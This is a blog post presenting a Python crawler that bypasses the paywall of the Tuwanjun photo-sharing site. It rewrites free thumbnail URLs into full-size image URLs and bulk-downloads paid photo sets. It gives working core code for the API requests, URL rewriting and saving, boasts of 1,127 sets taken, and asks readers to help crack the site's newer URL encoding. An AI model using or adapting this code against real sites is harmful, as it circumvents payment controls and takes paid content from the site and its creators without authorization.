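Please credit the source when reposting: https://www.cnblogs.com/CooperXia-847550730/p/10533558.html
Commercial use is prohibited; I take no responsibility for any consequences.
Xiao Xia is back with another blog post.
Update, July 28:
The bug has now been fixed. Below are the current full-size and thumbnail URLs. If anyone can tell which encoding or hash function is being used, please help: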
http://img4.tuwandata.com/v4/thumb/jpg/0jzUF68uv59al8ebGw14O0jSobjQ82o1sgld3dqyiQQ/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNxm5vYTWcBQBPs4lxofIIDDVim1oGbBWgRPuawq1D61NhUxeeJzZX9lVSQjIO3fgyT.jpg
http://img4.tuwandata.com/v4/thumb/jpg/YEAUN6ZWzfHEsgvPUPw9gdUbktn6iwdmnlyB750N6JX/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNxm5vYTWcBQBPs4lxofIIDDVim1oGbBWgRPuawq1D61NhUxeeJzZX9lVSQjIO3fgyT.jpg
F0T8XzPwra6yZkoLvv2Z90EsdPzyytjgLk0sQl5RUI3
0nNli0OxejHpzyKVvywJXEm5yTRcZo6uQRDUMjgOeAu/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNqHCyCn9OOp9AtNTrIM8rW93vyCEmhAT6ZRshSh4lWWBj1NuET2DQ8hxUAqFZ8lTOx.jpg
BXgEbTpyf4wvFKyQqj60F3KOwQ725PfdHLCEKYUIWN5
4XkDSNsY3jKCgTc6SvuirtbSF64gD6vhGnHGx3WUyme/u/GLDM9lMIBglnFv7YKftLBGTPBuZ18dsRxq7lLFRmwHNqFCvUrqmSG4Hr3vVp0zDfryydDwhgTxyTVbfMLhjM7h3lmIF6bRSli2HSEobMbl9c.jpg
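This time the crawler targets all the paid photo sets from the Tuwanjun (兔玩君) sharing plan.
If you haven't heard of it, take a look at www.tuwanjun.com
In short, the site loads its images with jQuery + JS. Only three images per set can be viewed for free; after that you have to pay.
However, I found a small loophole. The thumbnail URL and the full-size URL share essentially the same file name, and the path is built from parameters. Base64-decoding the URL shows that the thumbnail and the full-size image differ in only some of those parameters, so for each set the full-size addresses can be obtained by substituting that part.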
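As a rough illustration of the base64 step mentioned above, here is a minimal sketch of decoding a URL-safe base64 path segment whose `=` padding has been stripped. The helper name `decode_segment` and the sample payload are made up for this example; they are not taken from the site, and the real segments may well be structured differently.

```python
import base64


def decode_segment(segment: str) -> bytes:
    """Decode a URL-safe base64 segment, restoring any stripped '=' padding."""
    padded = segment + "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(padded)


# Hypothetical payload, encoded here only so there is something to decode
sample = base64.urlsafe_b64encode(b"width=158&height=158").decode().rstrip("=")
decoded = decode_segment(sample)
print(decoded)
```

Decoding two segments this way and comparing them side by side is one simple way to see which parameters differ.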
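Here are the results:
I wrote the script on March 14, and the first run fetched 1015 photo sets. I ran it again on June 4 and picked up 112 new sets, for a current total of 1127.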
I'm no longer providing the full source here, only the core code. Tips and sponsorship are welcome.
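import os
import re
from hashlib import md5
from urllib.parse import urlencode

import requests
from requests.exceptions import RequestException


def get_page(offset):
    # Query parameters for the detail API; offset is the photo set id
    key = {
        'type': 'image',
        'dpr': 3,
        'id': offset,
    }
    url = 'https://api.tuwan.com/apps/Welfare/detail?' + urlencode(key)
    try:
        response = requests.get(url)
        if response.status_code == 200:
            return response.text
        return None
    except RequestException:
        print("Page request failed", url)
        return None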
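To make the query-string step in `get_page` easier to follow, here is a small sketch of just the URL construction, with no network access. The function name `build_detail_url` is introduced only for this example; the endpoint and parameters are the ones used in the code above.

```python
from urllib.parse import urlencode


def build_detail_url(set_id: int) -> str:
    # Same parameters as get_page; urlencode turns the dict into a query string
    params = {"type": "image", "dpr": 3, "id": set_id}
    return "https://api.tuwan.com/apps/Welfare/detail?" + urlencode(params)


print(build_detail_url(1))
# → https://api.tuwan.com/apps/Welfare/detail?type=image&dpr=3&id=1
```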
def getUrl(html):
    # Grab every "thumb" field from the response text
    pattern1 = re.compile(r'"thumb":(.*?)}', re.S)
    result = re.findall(pattern1, html)
    # The first match is used as the full-size image URL
    bigUrl = result[0]
    bigUrl = bigUrl.replace('"', '').replace('\\', '')
    pattern2 = re.compile(r'(http.*?.+jpg),', re.S)
    result2 = re.findall(pattern2, bigUrl)
    bigUrl = result2[0]
    # The fourth match is used as the list of thumbnail URLs
    pattern3 = re.compile(r'(http.*?==.*?\.jpg)', re.S)
    result3 = re.findall(pattern3, result[3])
    # Strip the escaping backslashes from each thumbnail URL
    smallUrl = [item.replace('\\', '') for item in result3]
    return (bigUrl, smallUrl)
# Shared pattern: group 1 ends at the "wx" marker, group 2 is the part that
# differs between thumbnail and full-size URLs, group 3 is the "/u/..." tail
URL_PATTERN = re.compile(r'.*?thumb/jpg/+(.*?wx+)(.*?)(/u/.*?)\.jpg', re.S)


def findReplaceStr(url):
    result = re.match(URL_PATTERN, url)
    return result.group(2)


def getBigImageUrl(url, replaceStr):
    result = re.match(URL_PATTERN, url)
    newurl = 'http://img4.tuwandata.com/v3/thumb/jpg/' + result.group(1) + replaceStr + result.group(3)
    return newurl
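def save_image(content, offset):
    # One folder per photo set under ./image
    path = os.path.join(os.getcwd(), 'image', str(offset))
    # Name the file after the MD5 of its bytes so duplicates are skipped
    file_path = os.path.join(path, '{0}.{1}'.format(md5(content).hexdigest(), 'jpg'))
    if not os.path.exists(path):
        # makedirs also creates the parent ./image folder if it is missing
        os.makedirs(path)
    if not os.path.exists(file_path):
        with open(file_path, 'wb') as f:
            f.write(content)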
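The naming scheme in `save_image` (file name = MD5 of the image bytes) doubles as a cheap de-duplication check. Here is a minimal, self-contained sketch of that idea, run against a temporary directory so nothing is left on disk. The helper name `save_unique` and the sample byte strings are made up for the example.

```python
import os
import tempfile
from hashlib import md5


def save_unique(content: bytes, directory: str) -> str:
    """Write content to <directory>/<md5>.jpg unless that file already exists."""
    os.makedirs(directory, exist_ok=True)
    file_path = os.path.join(directory, md5(content).hexdigest() + ".jpg")
    if not os.path.exists(file_path):
        with open(file_path, "wb") as f:
            f.write(content)
    return file_path


with tempfile.TemporaryDirectory() as tmp:
    first = save_unique(b"same bytes", tmp)
    second = save_unique(b"same bytes", tmp)    # identical content, same path
    other = save_unique(b"different bytes", tmp)
    file_count = len(os.listdir(tmp))

print(file_count)
```

Identical content always maps to the same path, so running the script again does not write the same image twice.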
def download_images(url, offset):
    print('downloading:', url)
    try:
        response = requests.get(url)
        if response.status_code == 200:
            save_image(response.content, offset)
        return None
    except RequestException:
        print("Image request failed", url)
        return None
def download(bigImageUrl, smallImageUrl, offset):
    replaceStr = findReplaceStr(bigImageUrl)
    for url in smallImageUrl:
        download_images(getBigImageUrl(url, replaceStr), offset)